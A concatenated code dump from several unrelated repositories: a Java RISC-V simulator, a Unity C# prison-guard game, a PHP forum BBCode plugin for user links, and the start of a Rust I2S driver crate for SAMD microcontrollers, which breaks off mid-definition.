case "next":
case "n":
return 1;
case "inst":
System.out.println(bin.flipStr(instr));
break;
case "opcode":
System.out.println(instrOps.findOp(instr));
break;
case "func3":
System.out.println(instrOps.func3(instr));
break;
case "func7":
System.out.println(instrOps.func7(instr));
break;
case "rs1":
System.out.println(bin.binToInt(instrOps.rs1(instr)));
break;
case "rs2":
System.out.println(bin.binToInt(instrOps.rs2(instr)));
break;
case "rd":
System.out.println(bin.binToInt(instrOps.rd(instr)));
break;
case "readdata1":
System.out.println(bin.binToInt(readData1));
break;
case "readdata2":
System.out.println(bin.binToInt(readData2));
break;
case "immediate":
System.out.println(bin.binToInt(immediate));
break;
case "operation":
System.out.println(operation);
break;
case "aluop":
System.out.println(cont.aluop);
break;
case "aluresult":
System.out.println(bin.binToInt(aluResult));
break;
case "list":
case "\n":
default:
printCommands();
}
}
}
private void printCommands(){
System.out.println("Available commands:");
for (int i = 0; i < commands.length; i++){
System.out.print(commands[i] + " ");
}
System.out.println();
}
}
<file_sep>public class RISCVException extends Exception {
public RISCVException(String message){
super(message);
}
}
<file_sep>public final class bin {
//we only deal with signed binary here
public static int binToInt(String bin){
/*
int total = 0;
for (int i = bin.length() - 1; i >= 0; i-- ){
if (bin.charAt(i) == '1'){
total += Math.pow(2, (bin.length() - i - 1));
}
}
*/
int total = uBinToInt(bin);
if (bin.charAt(0) == '1'){
total = total - (int)Math.pow(2, (bin.length()));
}
return total;
}
public static int uBinToInt(String bin){
int total = 0;
for (int i = bin.length() - 1; i >= 0; i-- ){
if (bin.charAt(i) == '1'){
total += Math.pow(2, (bin.length() - i - 1));
}
}
return total;
}
public static String flipStr(String bin){
String newIns = "";
int len = bin.length();
for (int i = 0; i < len; i++){
newIns += bin.charAt(len - 1 - i);
}
return newIns;
}
public static String intToBin(int num){
if (num >= 0){return posIntToBin(num);}
else {return negIntToBin(num);}
}
private static String posIntToBin(int num){
int startingPow = 0;
int compareTo = 1;
while (compareTo <= num){
startingPow++;
compareTo = (int)Math.pow(2, startingPow);
}
String result = "";
int tempNum = num;
while (startingPow >= 0){
int power = (int)Math.pow(2, startingPow);
if (tempNum < power){
result += '0';
}
else{
result += '1';
tempNum -= power;
}
startingPow--;
}
return result;
}
private static String negIntToBin(int num){
String complement = posIntToBin(-1 * num - 1);
String result = "";
for (int i = 0; i < complement.length(); i++){
if(complement.charAt(i) == '1'){
result += '0';
}
else{
result += '1';
}
}
return result;
}
public static String signExtend(String binary, int targetLen){
char sign = binary.charAt(0);
return bitExtend(binary, targetLen, sign);
}
public static String bitExtend(String binary, int targetLen, char bit){
if (binary.length() > targetLen){
throw new AssertionError("Cannot sign extend to " + targetLen + " from " + binary.length() + " bits");
}
else if (binary.length() == targetLen){
return binary;
}
else{
int numRep = targetLen - binary.length();
String result = "";
for (int i = 0; i < numRep; i++){
result += bit;
}
result += binary;
return result;
}
}
}
<file_sep>public class dataMemory {
private String[][] memory; //save as bin str, 8 bits long per entry
public dataMemory(){
memory = new String[4][512];
}
public String handleMemory(int address, String reg2, String fct3, boolean memw, boolean memr){
if (memr){
switch (fct3){
case "010":
return loadWord(address);
case "001":
return loadHalf(address);
case "000":
return loadByte(address);
}
}
else if (memw){
switch (fct3){
case "010":
storeWord(address, bin.binToInt(reg2));
break;
case "001":
storeHalf(address, bin.binToInt(reg2));
break;
case "000":
storeByte(address, bin.binToInt(reg2));
break;
}
}
return bin.bitExtend("0", 32, '0');
}
private void checkIndex(int index){
if (index > 2047 || index <= 0){
throw new IndexOutOfBoundsException("Memory not in bound to load");
}
}
/*
Memory will be organized in little-endian fashion:
- the lowest significant bits will be held in the lowest addressed parcel
For now we use 4x512 memory structure with a total 2048 bytes of addressable memory, but
usually in a 32bit architecture 4GB of memory is supported
*/
//All LOAD instructions must return a 32bit binary String
private String loadWord(int index){ //index must be between 0 and 255
checkIndex(index);
String total = "";
for (int i = 0; i < 4; i++){
total = memory[i][index/4] + total;
}
return total;
}
private String loadHalf(int index){
checkIndex(index);
String total = "";
int whichHalf = index / 4 % 2;
for (int i = 0; i < 2; i++){
total = memory[i + whichHalf * 2][index/4] + total;
}
return total;
}
private String loadByte(int index){
checkIndex(index);
int whichQuart = index / 4 % 4;
String total = memory[whichQuart][index / 4];
return total;
}
private void storeWord(int index, int word){ //word = 32bit, stored as 4 8-bit segments
checkIndex(index);
String target = bin.intToBin(word);
target = bin.signExtend(target, 32);
for (int i = 0; i < 4; i ++){
memory[3-i][index/4] = target.substring(i*8, (i+1)*8);
}
}
private void storeHalf(int index, int word){
checkIndex(index);
String target = bin.intToBin(word);
target = bin.signExtend(target, 16);
int whichHalf = index / 4 % 2;
for (int i = 0; i < 2; i++){
memory[3 - (i + whichHalf * 2)][index / 4] = target.substring(i*8, (i+1)*8);
}
}
private void storeByte(int index, int word){
checkIndex(index);
String target = bin.intToBin(word);
target = bin.signExtend(target, 8);
int whichQuart = index / 4 % 4;
memory[3 - whichQuart][index / 4] = target;
}
}
<file_sep>public enum alu {
ALU_AND, // = 4'b0000,
ALU_OR,// = 4'b0001,
ALU_ADD,// = 4'b0010,
ALU_SUB,// = 4'b0110,
//ALU_LT = 4'b0111, // Less than
ALU_NOR,// = 4'b1100,
ALU_XOR,// = 4'b0111,
ALU_SLT,// = 4'b1000,
ALU_SLTU,//= 4'b1001,
ALU_SRA,// = 4'b0100,
ALU_SLL,// = 4'b0011,
ALU_SRL,// = 4'b0101,
ALU_SGE,// = 4'b1010,
ALU_SGEU,//= 4'b1011
}
| 17c2cbb00f29163337432d9be174095f43e3d7c5 | [
"Markdown",
"Java"
] | 11 | Java | kthirano/processingProcessors | 7a8b32fd29f532e86f61b111302f19f78be22b2d | bf2dd8c8ff8ed70744f5f5587f35820865f4691e |
refs/heads/master | <file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using UnityEngine.AI;
public enum susBehaviour
{
casual,
escaping,
escaped,
fighting
}
public class Prisioner : MonoBehaviour
{
#region BTS
public Vector3 target;
public Vector2 size;
public NavMeshAgent agent;
public NavMeshPath navMeshPath;
#endregion BTS
Animator animator;
#region Stats
public bool markedFighting;
public Vector3 fightingPos;
public susBehaviour currentBehaviour;
public float EscapeChance = 1;
public float fightChance = 1;
public float fightCoolDown = 5;
public float fightCoolDownMax = 8;
public Vector3 escapePos;
public fight fightImIn;
#endregion Stats
public PrisionManager prisionManagerScript;
public int group;
public Color baseColor;
public Color escapingColor;
public Color fightingColor;
public Color escapedColor;
public Sound escapeSound;
[Range(0, 1)]
public float escapeSoundVolume;
public Sound escapedSound;
[Range(0, 1)]
public float escapedSoundVolume;
void Start()
{
animator = GetComponent<Animator>();
navMeshPath = new NavMeshPath();
//Vector3 pos;
//pos.x = Random.Range(-size.x / 2, size.x / 2);
//pos.z = Random.Range(-size.y / 2, size.y / 2);
//pos.y = 0.5f;
//transform.position = pos;
transform.position = prisionManagerScript.GetRandomWayPoint(group).position;
GetRandomTarget();
agent.CalculatePath(target, navMeshPath);
}
// Update is called once per frame
void Update()
{
fightCoolDown -= Time.deltaTime;
float blendValue = Vector3.Magnitude(agent.velocity) / agent.speed;
switch (currentBehaviour)
{
case susBehaviour.casual:
agent.CalculatePath(target, navMeshPath);
if (navMeshPath.status != NavMeshPathStatus.PathComplete)
{
GetRandomTarget();
}
agent.SetDestination(target);
if (Vector3.Distance(transform.position, target) < 1)
{
// stay for a period of time
// randomise a idle time
//tries to escape
float randomNumber = Random.Range(0, 100);
// Debug.Log("Finsihed path");
if (randomNumber < EscapeChance)
{
// Debug.Log("trying to escape");
currentBehaviour = susBehaviour.escaping;
SoundManager.current.PlaySound(escapeSound, transform.position, escapeSoundVolume);
//agent.CalculatePath(escapePos.position, navMeshPath);
}
else
{
GetRandomTarget();
}
}
//COLOR
this.transform.GetChild(0).GetChild(1).GetComponent<Renderer>().material.SetColor("_Color", baseColor);
break;
case susBehaviour.escaping:
Vector3 exit = prisionManagerScript.exits[group][0].position;
float dist = Vector3.Distance(transform.position, prisionManagerScript.exits[group][0].position);
for (int i = 1; i < prisionManagerScript.exits[group].Count; i++)
{
float d = Vector3.Distance(transform.position, prisionManagerScript.exits[group][i].position);
if (d < dist)
{
exit = prisionManagerScript.exits[group][i].position;
dist = d;
}
}
escapePos = exit;
agent.SetDestination(escapePos);
if (Vector3.Distance(transform.position, escapePos) < 3)
{
//Debug.Log("Escaped");
prisionManagerScript.currentPrisionDamage += prisionManagerScript.escapedPrisonerDamage;
currentBehaviour = susBehaviour.escaped;
SoundManager.current.PlaySound(escapedSound, transform.position, escapedSoundVolume);
// gameObject.SetActive(false);
}
//COLOR
this.transform.GetChild(0).GetChild(1).GetComponent<Renderer>().material.SetColor("_Color", escapingColor);
break;
case susBehaviour.fighting:
agent.CalculatePath(fightingPos, navMeshPath);
agent.SetDestination(fightingPos);
//agent.transform.localRotation = Vector3.RotateTowards(agent, fightingPos, );
//COLOR
this.transform.GetChild(0).GetChild(1).GetComponent<Renderer>().material.SetColor("_Color", fightingColor);
break;
case susBehaviour.escaped:
//COLOR
this.transform.GetChild(0).GetChild(1).GetComponent<Renderer>().material.SetColor("_Color", escapedColor);
break;
}
animator.SetFloat("Blend", blendValue);
if (currentBehaviour == susBehaviour.fighting)
{
animator.SetBool("Fighting", true);
}
else
{
animator.SetBool("Fighting", false);
}
}
void OnTriggerEnter(Collider other)
{
if(other.tag == "Prisioner")
{
if ((fightCoolDown <= 0)&& other.transform.GetComponent<Prisioner>().fightCoolDown<=0 && currentBehaviour!=susBehaviour.escaped && other.transform.GetComponent<Prisioner>().currentBehaviour !=susBehaviour.escaped)
{
//Debug.Log("hit");
float randomNumber = Random.Range(0, 100);
if (randomNumber < fightChance)
{
fightCoolDown = fightCoolDownMax;
other.transform.GetComponent<Prisioner>().fightCoolDown = fightCoolDownMax;
prisionManagerScript.attemptToStartAFight(this, other.transform.GetComponent<Prisioner>());
}
}
}
}
public void GetRandomTarget()
{
//target.x = Random.Range(-size.x / 2, size.x / 2);
//target.z = Random.Range(-size.y / 2, size.y / 2);
//target.y = 0.0f;
target = prisionManagerScript.GetRandomWayPoint(group).position;
}
public void StopSussyBehaviour()
{
if(currentBehaviour == susBehaviour.escaped)
{
}
else if(currentBehaviour == susBehaviour.fighting)
{
fightImIn.fighterB.GetRandomTarget();
fightImIn.fighterA.GetRandomTarget();
fightImIn.fighterB.currentBehaviour = susBehaviour.casual;
fightImIn.fighterA.currentBehaviour = susBehaviour.casual;
prisionManagerScript.CurrentFights.Remove(fightImIn);
}
else
{
currentBehaviour = susBehaviour.casual;
GetRandomTarget();
}
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class FootStep : MonoBehaviour
{
public Transform leftFoot;
public Transform rightFoot;
public float footStepVolume;
public Sound sound;
public void PlayFootStepSoundLeft()
{
SoundManager.current.PlaySound(sound, leftFoot.position, footStepVolume);
}
public void PlayFootStepSoundRight()
{
SoundManager.current.PlaySound(sound, rightFoot.position, footStepVolume);
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class RayReceiver : MonoBehaviour
{
protected bool hit = false;
public void Hit()
{
hit = true;
}
void LateUpdate()
{
hit = false;
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class DebugLines : MonoBehaviour
{
public LineRenderer lineRenderer;
public GameObject hand;
void Start()
{
}
// Update is called once per frame
void Update()
{
Ray ray = new Ray(hand.transform.position, hand.transform.forward);
lineRenderer.SetPosition(0, ray.origin);
lineRenderer.SetPosition(1, ray.origin + 100 * ray.direction);
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class PhysicalPusher : MonoBehaviour
{
public Transform pointer;
LineRenderer lineRenderer;
void Start()
{
lineRenderer = GetComponent<LineRenderer>();
}
// Update is called once per frame
void Update()
{
Ray ray = new Ray(pointer.position, pointer.forward);
RaycastHit hit;
lineRenderer.SetPosition(0, ray.origin);
lineRenderer.SetPosition(1, ray.origin + 100 * ray.direction);
if (OVRInput.Get(OVRInput.Button.PrimaryIndexTrigger))
{
if (Physics.Raycast(ray, out hit))
{
Rigidbody body = hit.collider.GetComponent<Rigidbody>();
if (body)
body.AddForce(100.0f * ray.direction);
}
}
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using UnityEngine.AI;
enum featureLevel
{
// when used to tell when
}
public class fight : MonoBehaviour
{
public Prisioner fighterA;
public Prisioner fighterB;
public float currentLength =0;
}
public class PrisionManager : MonoBehaviour
{
// enum features added
// list of when each feature gets added
public List<List<Prisioner>> AllPrisioner;
public List<List<Transform>> wayPoints;
public List<List<Transform>> exits;
public List<fight> CurrentFights;
public float maxPrisionDamage=5;
public float currentPrisionDamage;
public GameObject PhysicalPrisionerList;
public GameObject wayPointObject;
public GameObject exitObject;
public float maxFightLength;
public float passiveFightDamage = 1;
public float endOfFightDamage = 5;
public float escapedPrisonerDamage;
public float currentGameTime =0;
public float maxGameTime =60;
public GameManagerScript GameManager;
#region UI
public GameObject playerHealthBar;
public GameObject TimeBar;
public GameObject candle;
public GameObject fireParticle;
public Vector3 originalFirePos;
#endregion UI
public List<Sound> engageSounds;
public List<Sound> disengageSounds;
[Range(0, 1)]
public float engageSoundVolume;
[Range(0, 1)]
public float disengageSoundVolume;
public List<GameObject> tallyMarks;
void Start()
{
SetUpWayPoints();
SetUpPrisioners();
SetExits();
originalFirePos = fireParticle.transform.localPosition;
}
void SetExits()
{
exits = new List<List<Transform>>();
for (int i = 0; i < exitObject.transform.childCount; i++)
{
exits.Add(new List<Transform>());
for (int j = 0; j < exitObject.transform.GetChild(i).childCount; j++)
{
exits[i].Add(exitObject.transform.GetChild(i).GetChild(j).GetComponent<Transform>());
}
}
}
void SetUpPrisioners()
{
AllPrisioner = new List<List<Prisioner>>();
for (int i = 0; i < PhysicalPrisionerList.transform.childCount; i++)
{
AllPrisioner.Add(new List<Prisioner>());
for (int j = 0; j < PhysicalPrisionerList.transform.GetChild(i).childCount; j++)
{
AllPrisioner[i].Add(PhysicalPrisionerList.transform.GetChild(i).GetChild(j).GetComponent<Prisioner>());
PhysicalPrisionerList.transform.GetChild(i).GetChild(j).GetComponent<Prisioner>().group = i;
}
// NavMeshAgent agent = PhysicalPrisionerList.transform.GetChild(i).GetComponent<NavMeshAgent>();
// agent.avoidancePriority = i;
}
}
void SetUpWayPoints()
{
wayPoints = new List<List<Transform>>();
for (int i = 0; i < wayPointObject.transform.childCount; i++)
{
wayPoints.Add(new List<Transform>());
for (int j = 0; j < wayPointObject.transform.GetChild(i).childCount; j++)
{
wayPoints[i].Add(wayPointObject.transform.GetChild(i).GetChild(j).transform);
}
}
}
public Transform GetRandomWayPoint(int group)
{
int index = Random.Range(0, wayPoints[group].Count - 1);
return wayPoints[group][index];
}
void UpdateUI()
{
// Debug.Log((currentPrisionDamage / maxPrisionDamage));
// playerHealthBar.GetComponent<RectTransform>().localScale = new Vector3((currentPrisionDamage / maxPrisionDamage) , playerHealthBar.GetComponent<RectTransform>().localScale.y, playerHealthBar.GetComponent<RectTransform>().localScale.z);
// TimeBar.GetComponent<RectTransform>().localScale = new Vector3((currentGameTime / maxGameTime), TimeBar.GetComponent<RectTransform>().localScale.y, TimeBar.GetComponent<RectTransform>().localScale.z);
/*
int index = (int)(candles.Length * percent);
for (int i = 0; i < candles.Length; i++)
{
if (i == index)
{
candles[i].SetActive(true);
}
else
{
candles[i].SetActive(false);
}
}
*/
}
public void attemptToStartAFight(Prisioner A, Prisioner B)
{
// check if they're fighting
if (A.currentBehaviour != susBehaviour.fighting && B.currentBehaviour != susBehaviour.fighting &&
A.currentBehaviour != susBehaviour.escaping && B.currentBehaviour != susBehaviour.escaping)
{
CurrentFights.Add(new fight());
CurrentFights[CurrentFights.Count - 1].fighterA = A;
CurrentFights[CurrentFights.Count - 1].fighterB = B;
A.currentBehaviour = susBehaviour.fighting;
B.currentBehaviour = susBehaviour.fighting;
Vector3 middleOfFight = new Vector3((A.transform.position.x + B.transform.position.x) / 2, (A.transform.position.y + B.transform.position.y) / 2, (A.transform.position.z + B.transform.position.z) / 2);
A.fightingPos = middleOfFight;
B.fightingPos = middleOfFight;
A.fightImIn = CurrentFights[CurrentFights.Count - 1];
B.fightImIn = CurrentFights[CurrentFights.Count - 1];
//COLOR
// A.transform.GetChild(0).GetChild(1).GetComponent<Renderer>().material.SetColor("_Color", new Color(0, 0, 255));
//COLOR
// B.transform.GetChild(0).GetChild(1).GetComponent<Renderer>().material.SetColor("_Color", new Color(0, 0, 255));
int index = Random.Range(0, engageSounds.Count - 1);
SoundManager.current.PlaySound(engageSounds[index], middleOfFight, engageSoundVolume);
//Debug.Log(middleOfFight);
}
}
void Update()
{
float percent = (maxGameTime - currentGameTime) / maxGameTime;
candle.transform.localScale = new Vector3(1, percent, 1);
fireParticle.transform.localPosition = new Vector3(fireParticle.transform.localPosition.x, originalFirePos.y - 0.611f * (currentGameTime / maxGameTime), fireParticle.transform.localPosition.z);
float percentage = currentPrisionDamage / maxPrisionDamage;
int tallyIndex = (int)(tallyMarks.Count * percentage);
for (int i = 0; i < tallyMarks.Count; i++)
{
if (i >= tallyIndex)
{
tallyMarks[i].SetActive(false);
}
else
{
tallyMarks[i].SetActive(true);
}
}
/*
int index = (int)(candles.Length * percent);
for (int i = 0; i < candles.Length; i++)
{
if (i == index)
{
candles[i].SetActive(true);
}
else
{
candles[i].SetActive(false);
}
}
*/
currentGameTime += Time.deltaTime;
for (int i=0; i<CurrentFights.Count; i++)
{
CurrentFights[i].currentLength += Time.deltaTime;
currentPrisionDamage += Time.deltaTime * passiveFightDamage;
if (CurrentFights[i].currentLength>=maxFightLength)
{
// fight ended.
currentPrisionDamage += endOfFightDamage;
CurrentFights[i].fighterA.currentBehaviour = susBehaviour.casual;
CurrentFights[i].fighterB.currentBehaviour = susBehaviour.casual;
CurrentFights.RemoveAt(i);
Prisioner a = CurrentFights[i].fighterA;
Prisioner b = CurrentFights[i].fighterB;
Vector3 middleOfFight = new Vector3((a.transform.position.x + b.transform.position.x) / 2, (a.transform.position.y + b.transform.position.y) / 2, (a.transform.position.z + b.transform.position.z) / 2);
int index = Random.Range(0, disengageSounds.Count - 1);
SoundManager.current.PlaySound(disengageSounds[index], middleOfFight, disengageSoundVolume);
}
}
if(currentPrisionDamage>=maxPrisionDamage)
{
// death
GameManager.loadLoseScreen();
}
if(currentGameTime>= maxGameTime)
{
// time out
GameManager.loadWinScreen();
}
UpdateUI();
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class Movement : MonoBehaviour
{
public Transform cam;
public float speed = 3;
// Update is called once per frame
void Update()
{
if (cam.eulerAngles.x > 10 && cam.eulerAngles.x < 30)
{
Vector3 fwd = cam.forward;
fwd.y = 0;
transform.position += fwd * speed * Time.deltaTime;
}
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public enum Sound
{
FootStep,
EngageFight1,
EngageFight2,
EngageFight3,
DisengageFight1,
DisengageFight2,
DisengageFight3,
Escape,
Escaped
}
public class SoundManager : MonoBehaviour
{
public static SoundManager current;
[Range(0, 1)]
public float volume;
public Dictionary<Sound, AudioClip> audioMap = new Dictionary<Sound, AudioClip>();
private void Awake()
{
current = this;
audioMap.Add(Sound.FootStep, Resources.Load<AudioClip>("Sounds/FootStep"));
audioMap.Add(Sound.EngageFight1, Resources.Load<AudioClip>("Sounds/Engage Fight Sounds/EngageFight 1"));
audioMap.Add(Sound.EngageFight2, Resources.Load<AudioClip>("Sounds/Engage Fight Sounds/EngageFight 2"));
audioMap.Add(Sound.EngageFight3, Resources.Load<AudioClip>("Sounds/Engage Fight Sounds/EngageFight 3"));
audioMap.Add(Sound.DisengageFight1, Resources.Load<AudioClip>("Sounds/Disengage Fight Sounds/DisengageFight 1"));
audioMap.Add(Sound.DisengageFight2, Resources.Load<AudioClip>("Sounds/Disengage Fight Sounds/DisengageFight 2"));
audioMap.Add(Sound.DisengageFight3, Resources.Load<AudioClip>("Sounds/Disengage Fight Sounds/DisengageFight 3"));
audioMap.Add(Sound.Escape, Resources.Load<AudioClip>("Sounds/New Sounds/Run Alarm Sound"));
audioMap.Add(Sound.Escaped, Resources.Load<AudioClip>("Sounds/New Sounds/Game Win"));
}
AudioSource PlayClipAt(AudioClip clip, Vector3 pos, float volume)
{
GameObject tempGO = new GameObject("TempAudio"); // create the temp object
tempGO.transform.position = pos; // set its position
AudioSource aSource = tempGO.AddComponent<AudioSource>(); // add an audio source
aSource.clip = clip; // define the clip
// set other aSource properties here, if desired
aSource.volume = volume;
aSource.dopplerLevel = 0;
aSource.spatialBlend = 1;
aSource.Play(); // start the sound
Destroy(tempGO, clip.length); // destroy object after clip duration
return aSource; // return the AudioSource reference
}
public void PlaySound(Sound sound, Vector3 position, float multiplier)
{
PlayClipAt(audioMap[sound], position, volume * multiplier);
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class KeyboardPlayerMovement : MonoBehaviour
{
#region Public Variables
public Camera head;
public float moveSpeed = 50;
public float cameraRotateSpeed = 50;
public Color highlightCol;
public Color passiveCol;
public LayerMask mask;
#endregion
#region Private Variables
float xMoveAmount;
float yMoveAmount;
float xTiltAmount;
float yTiltAmount;
LineRenderer lineRenderer;
GameObject lastTouched;
bool mounted = false;
bool unmounting = false;
public Vector3 positionBefore;
CharacterController characterController;
#endregion
void Start()
{
lineRenderer = GetComponent<LineRenderer>();
characterController = GetComponent<CharacterController>();
}
// Update is called once per frame
void Update()
{
passiveLook();
//if (Input.GetMouseButtonDown(0))
//if (Input.GetKeyDown(KeyCode.E))
//{
// if (!mounted)
// {
// PointAtSpotlight();
// }
// else
// {
// mounted = false;
// characterController.enabled = false;
// transform.localPosition = positionBefore;
// characterController.enabled = true;
// }
//}
xMoveAmount = Input.GetAxis("Horizontal");
yMoveAmount = Input.GetAxis("Vertical");
xTiltAmount += Input.GetAxis("Mouse X") * cameraRotateSpeed * Time.deltaTime;
yTiltAmount -= Input.GetAxis("Mouse Y") * cameraRotateSpeed * Time.deltaTime;
//yTiltAmount = Mathf.Clamp(yTiltAmount, -90.0f, 90.0f);
head.transform.localRotation = Quaternion.Euler(yTiltAmount, 0.0f, 0.0f);
transform.eulerAngles = new Vector3(0.0f, xTiltAmount, 0.0f);
//head.transform.Rotate(new Vector3(-xTiltAmount, yTiltAmount));
}
void FixedUpdate()
{
Vector3 camForward = head.transform.forward; // Used to have the player move based on the camera direction
camForward.y = 0;
camForward.Normalize();
Vector3 camRight = head.transform.right; // use our camera's right vector, which is always horizontal
camRight.Normalize();
Vector3 delta = (xMoveAmount * camRight + yMoveAmount * camForward) * moveSpeed * Time.fixedDeltaTime;
if (!mounted)
{
characterController.SimpleMove(delta);
}
}
void PointAtSpotlight()
{
// raycast
// if pris do something
Ray ray = new Ray(head.transform.position, head.transform.forward);
RaycastHit hit;
//lineRenderer.SetPosition(0, ray.origin);
//lineRenderer.SetPosition(1, ray.origin + 100 * ray.direction);
if (Physics.Raycast(ray, out hit))
{
WatchTower spotLight = hit.collider.GetComponent<WatchTower>();
if (spotLight)
{
hit.collider.GetComponent<Renderer>().material.SetColor("_Color", new Color(255, 0, 0));
positionBefore = transform.position;
transform.localPosition = spotLight.mount.localPosition;
//transform.SetParent(spotLight.mount);
mounted = true;
}
}
}
void passiveLook()
{
// raycast
// if pris do something
Ray ray = new Ray(head.transform.position, head.transform.forward);
RaycastHit[] hits;
lineRenderer.SetPosition(0, ray.origin);
lineRenderer.SetPosition(1, ray.origin + 100 * ray.direction);
hits = Physics.RaycastAll(ray);
bool hitted = false;
for (int i = 0; i < hits.Length; i++)
{
RaycastHit hit = hits[i];
if (mask == (mask | 1 << hit.collider.gameObject.layer))
{
//Debug.Log("Hit");
hit.collider.gameObject.GetComponent<Renderer>().material.SetColor("_Color", highlightCol);
lastTouched = hit.collider.gameObject;
hitted = true;
if (Input.GetKeyDown(KeyCode.E))
{
Debug.Log("Hit");
Transform parent = hit.collider.gameObject.transform.parent.parent;
if (parent)
{
Prisioner prisioner = parent.GetComponent<Prisioner>();
if (prisioner)
{
prisioner.StopSussyBehaviour();
}
}
}
break;
}
}
if (!hitted && lastTouched != null)
{
lastTouched.GetComponent<Renderer>().material.SetColor("_Color", passiveCol);
lastTouched = null;
}
}
}
| af7992d6b8544ac2ece3a512b58c398a8d53373b | [
"C#"
] | 9 | C# | LiamSmithCPU/Sussy | 6061fddbcd1d4d0d7412853b95577d1e4dc0d019 | 0f5f5445d4fb222f82486cb81dad0bbf7c3bd63d |
refs/heads/master | <file_sep><?php
// wcf imports
require_once(WCF_DIR.'lib/data/message/bbcode/BBCodeParser.class.php');
require_once(WCF_DIR.'lib/data/message/bbcode/BBCode.class.php');
/**
* Parses the [user]-BBCode.
*
* @author <NAME>
* @copyright 2011 wbbaddons.de
* @license Creative Commons BY-ND <http://creativecommons.org/licenses/by-nd/3.0/de/>
* @package de.wbbaddons.wcf.bbcode.user
*/
class UserBBCode implements BBCode {
/**
* @see BBCode::getParsedTag()
*/
public function getParsedTag($openingTag, $content, $closingTag, BBCodeParser $parser) {
$userID = intval(isset($openingTag['attributes'][0]) ? $openingTag['attributes'][0] : 0);
if ($userID == 0) {
$user = new User(null, null, StringUtil::decodeHTML($content));
$userID = $user->userID;
$content = $user->username;
}
if ($parser->getOutputType() == 'text/html') {
return '<img src="'.StyleManager::getStyle()->getIconPath('userS.png').'" alt="" /> <a href="index.php?page=User&userID='.$userID.'">'.$content.'</a>';
}
else if ($parser->getOutputType() == 'text/plain') {
return $content;
}
}
}
<file_sep><?php
// wcf imports
require_once(WCF_DIR.'lib/system/event/EventListener.class.php');
/**
* Adds the UserID for [user]-BBCode.
*
* @author <NAME>
* @copyright 2011 wbbaddons.de
* @license Creative Commons BY-ND <http://creativecommons.org/licenses/by-nd/3.0/de/>
* @package de.wbbaddons.wcf.bbcode.user
*/
class URLParserUserBBCodeListener implements EventListener {
/**
* @see EventListener::execute()
*/
public function execute($eventObj, $className, $eventName) {
// the only one we do not get is a username that contains "[/user]". But who would name himself that way? :D
preg_match_all('~\[user\](.*?)\[/user\]~', URLParser::$text, $matches);
// sort out duplicates, saves queries
array_unique($matches[1]);
foreach ($matches[1] as $match) {
$user = new User(null, null, $match);
if (!$user->userID) {
URLParser::$text = StringUtil::replace('[user]'.$match.'[/user]', $match, URLParser::$text);
}
else {
URLParser::$text = StringUtil::replace('[user]'.$match.'[/user]', '[user='.$user->userID.']'.$user->username.'[/user]', URLParser::$text);
}
}
}
}
| 1c0acc981d2aa8b21f4567d878cb6d8c5dda6467 | [
"PHP"
] | 2 | PHP | wbbaddons/User-BBCode | 42cfcbaeedb86b234e7f31a370d5960ab11072eb | 8d02b935bb961940231db3303507156dc07dc117 |
refs/heads/main | <file_sep>TODO for samd-i2s:
* Document
* Condition defmt on a feature flag
* Make the serializer allocation dynamic based on supplied pins
* Optionally get the clock(s) from external sources
* Warn if clock divisions don't work out evenly
* Allow not configuring a sender/receiver
* Add an i2s master along the lines of tdm_master()
* Implement a receive() like send()
* Re-implementation of MasterClock::freq() seems strange...
* Use Sealed as in https://github.com/atsamd-rs/atsamd/issues/214<file_sep>[package]
name = "samd-i2s"
version = "0.1.0"
authors = ["<NAME> <<EMAIL>>"]
edition = "2018"
keywords = ["no-std", "arm", "cortex-m", "embedded-hal", "samd", "atsamd", "samd21"]
[dependencies]
cortex-m = "~0.6"
defmt = "0.2.0"
defmt-rtt = "0.2.0"
[dependencies.atsamd-hal]
# Under-development version with DMA support
default-features = false
# git = "https://github.com/ianrrees/atsamd"
# branch = "add-dma"
path = '/home/irees/Projects/20201112 - atsamd-rs/hal'
[features]
samd21 = []
samd21g18a = ["samd21", "atsamd-hal/samd21g", "defmt-default"]
defmt-default = []
defmt-trace = []
defmt-debug = []
defmt-info = []
defmt-warn = []
defmt-error = []<file_sep>Obsolete - Do Not Use
===
This repo was a scratchpad space, the active code has moved to [a branch](https://github.com/ianrrees/atsamd/tree/add-i2s) of [the ATSAMD HAL](https://github.com/atsamd-rs/atsamd). Eventually, the plan is to merge it in with the upstream HAL.
<file_sep>#![no_std]
// feature approach cribbed from https://github.com/proman21/samd-dma
// TODO improve
#[cfg(not(feature = "samd21"))]
compile_error!("Please use this crate's feature flags to select a target.");
#[cfg(feature = "samd21")]
extern crate atsamd_hal as hal;
extern crate defmt_rtt;
use core::convert::From;
use core::marker::PhantomData;
use hal::dmac::Buffer;
use hal::gpio;
use hal::target_device as pac;
use hal::time::Hertz;
// TODO for samd5x parts, this will need to be pac::dmac::chctrla::TRIGSRC_A
#[cfg(any(feature = "samd11", feature = "samd21"))]
pub use pac::dmac::chctrlb::TRIGSRC_A as DmaTriggerSource;
// Havent
#[cfg(any(
feature = "samd51",
feature = "same51",
feature = "same53",
feature = "same54"
))]
pub use pac::dmac::chctrla::TRIGSRC_A as DmaTriggerSource;
pub use pac::i2s::clkctrl::SLOTSIZE_A as BitsPerSlot;
use pac::i2s::serctrl::CLKSEL_A as ClockUnitID;
//////////// This probably belongs in an I2S trait crate? ////////////
#[derive(Debug)]
pub enum I2SError {
/// An operation would block because the device is currently busy or there is no data available.
WouldBlock,
}
/// Result for I2S operations.
pub type Result<T> = core::result::Result<T, I2SError>;
pub struct ClockUnit0;
pub struct ClockUnit1;
/// Allows compile-time associations between pins and clock units
pub trait ClockUnit {
const ID: ClockUnitID;
}
impl ClockUnit for ClockUnit0 {
const ID: ClockUnitID = ClockUnitID::CLK0;
}
impl ClockUnit for ClockUnit1 {
const ID: ClockUnitID = ClockUnitID::CLK1;
}
// TODO perhaps have something like this in gpio?
pub struct ExternalClock<PinType> {
frequency: Hertz,
pin: PhantomData<PinType>,
}
pub trait MasterClock<ClockUnit> {
